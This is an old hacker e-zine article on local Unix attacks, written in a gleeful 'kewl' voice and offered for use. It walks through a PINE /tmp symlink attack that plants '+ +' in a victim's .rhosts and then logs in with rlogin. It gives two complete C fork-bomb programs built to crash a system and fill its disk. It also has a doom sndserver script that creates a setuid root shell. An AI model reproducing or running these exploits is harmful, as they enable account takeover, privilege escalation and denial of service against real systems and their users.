How to get in ...
=================
By Control-Z
Control_Z12@hotmail.com
This issue presents some methods to attack from inside, when ya have an
account on the system, without to have root privilegies.
For most unix systems the most popular bug is an old pine bug. It works good
on PINE 3.91 but is fixed on PINE 3.95. This very nice mail programm leaves a
temporary logfile in /tmp with mode 666. This static file appears when there
is an active pine session, and a new mail is in the INBOX.
What is to do now. Ya watch the process with "ps aux" and it reveals what users
use pine. Then ya create a symbolic link from that file.
For this example, hamors is the victim while catluvr is the attacker:
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
hamors (23 19:09) litterbox:~> pine
catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
and ya are in his account, and when he is a root ... kewl.
-----------------------------------------------------------------------------
Another kewl class of attack from inside is to crash the system. The very
classical method is the fork bomb:
------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
main()
{
switch (fork())
{
case 0:
setpgrp();
break;
case -1:
fprintf(stderr,"error: fork() failed\n");
exit(1);
default:
printf("Allocating all resources in background...\n");
_exit(0);
}
for(;;)
{
if (!fork())
setpgrp();
malloc((size_t)1);
malloc((size_t)10);
malloc((size_t)100);
malloc((size_t)1000);
malloc((size_t)10000);
malloc((size_t)100000);
malloc((size_t)1000000);
}
}
-------------------------------------
or this one:
-------------------------------------
/* DOS-CoViN. Version .53b, coded by Vio, some ideas are from the
bugtraq
This program is a beefed up classic denial of service fork()'er :)
Compilation:
on BSD type of systems do: gcc -DBSD_C -o cvn cvn.c
on SysV type of systems do: gcc -DSYSV_C -o cvn cvn.c
on my linux, I can compile it with both -DBSD_C and -DSYSV_C
if your not sure, you can experiment, or compile it
without any -D'efines
In the future:
SunOS signals ignored.
Creation of random symlinks for more gory destruction.
Using advanced technology coding to make the hard drive
blow up with a loud boom and the console explode
causing a nuclear meltdown.
Direct All Suggestions And Flames to: Vio
NOTE: this program is provided for educational purposes only, its author
will not take any responsibility for any stupid things you will
decide to do.
this has been tested, but not the latest version of it.
.a&$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$&a.
$$' s `$' s `$ $ $ $ `$ $$
$$ $ $ $ $ $ $ $ $$
$$ $ $ p $ h $ e $ a $ r $ $a. $$
$$ $ssss$ $ $ $ $ $ $$$ $$
$$ $ $ $ $. $ ,$ $ $$$ $$
$$. $ ,$. $ ,$$. ,$$ .$ $$$ $$
`$$&@%o%@&$$$&@%o%@&$$$$$%o%$$$$.a$$$.a$$$$$$$$'
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>
#define MAX_FILELEN 100 /* The _actual_ max length */
#define MAX_DIRLEN 10
#define START_DIR "/tmp" /* This can be substituted for any directory */
/* that you have write access to */
void dirs_generator(void);
main(int argc, char *argv[])
{
int fp;
char *buff;
char chr;
unlink(argv[0]);
/* You might wanna ignore all the signals you can ignore.. */
signal(SIGINT, SIG_IGN); /* If any of the signals don't work */
signal(SIGHUP, SIG_IGN); /* on the system you are compiling */
signal(SIGTERM, SIG_IGN); /* them on, just erase that line */
signal(SIGALRM, SIG_IGN);
signal(SIGBUS, SIG_IGN);
signal(SIGFPE, SIG_IGN);
signal(SIGILL, SIG_IGN);
signal(SIGIOT, SIG_IGN);
signal(SIGPIPE, SIG_IGN);
signal(SIGQUIT, SIG_IGN);
signal(SIGSEGV, SIG_IGN);
signal(SIGTRAP, SIG_IGN);
signal(SIGUSR1, SIG_IGN);
signal(SIGUSR2, SIG_IGN);
#ifdef BSD_C
signal(SIGPROF, SIG_IGN);
signal(SIGSTOP, SIG_IGN);
signal(SIGTSTP, SIG_IGN);
signal(SIGTTIN, SIG_IGN);
signal(SIGTTOU, SIG_IGN);
signal(SIGVTALRM, SIG_IGN);
signal(SIGXCPU, SIG_IGN);
signal(SIGXFSZ, SIG_IGN);
#endif
#ifdef SYSV_C
signal(SIGPOLL, SIG_IGN);
signal(SIGPWR, SIG_IGN);
#endif
if(fork()) {
printf("Now crashing and blowing up this system.. have a nice day\n");
printf("You can safely logout, and let the proggie do its work\n");
printf("or you can stick around and watch lag go from 0 to bitch\n");
printf("in a matter of seconds\n");
printf(" --CoViN \n");
exit(0);
}
fp=open("/tmp/.foo",O_WRONLY|O_CREAT);
if(fork()) {
while(1) {
fork();
buff = malloc(64000);
write(fp, buff, 64000);
system("uptime");
}
}
dirs_generator();
}
void dirs_generator(void)
{
char alph[] = "�������abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. ";
char fl[MAX_FILELEN];
char dir[MAX_DIRLEN];
int i;
int flen;
printf("Making dirs..\n");
chdir(START_DIR);
fork(); /* For the simplicity of the code.. we also want more dir's from */
fork(); /* the START_DIR */
fork();
while(1) {
fork();
flen= (rand() % MAX_FILELEN) - 1;
for(i=0; i<flen; i++)
fl[i] = alph[rand() % strlen(alph)];
fl[MAX_FILELEN-1]=0;
i=open(fl,O_WRONLY|O_CREAT);
write(i,"fuck you! CoViN",16);
close(i);
flen= (rand() % MAX_DIRLEN) - 1;
for(i=0; i<flen; i++)
dir[i] = alph[rand() % strlen(alph)];
dir[MAX_DIRLEN-1]=0;
mkdir(dir,0);
chdir(dir);
}
}
-------------------------------------
When there is the very nice doom game ya can fork...
-------------------------------------
------------ CUT HERE --------------
#!/bin/sh
# Tue Dec 17 10:02:20 MET 1996 Bo
echo 'sndserver "/tmp/sndserver"' > .doomrc
cat > /tmp/sndserver.c << EOF
#include <stdio.h>
#include <unistd.h>
main() {
if (fork()) while (getc(stdin));
else system("cp /bin/sh /tmp; chmod +s /tmp/sh");
/* or whatever you like to do */
}
EOF
gcc /tmp/sndserver.c -o /tmp/sndserver
------------ CUT HERE --------------
The fork() is just so that doom runs on nicely without locking up the
keyboard and sndserver gobbles up all the sound data send to it. Run
the script, start sdoom, quit the normal way, and execute /tmp/sh.
--------------------------------------
If ya know some other, just send us...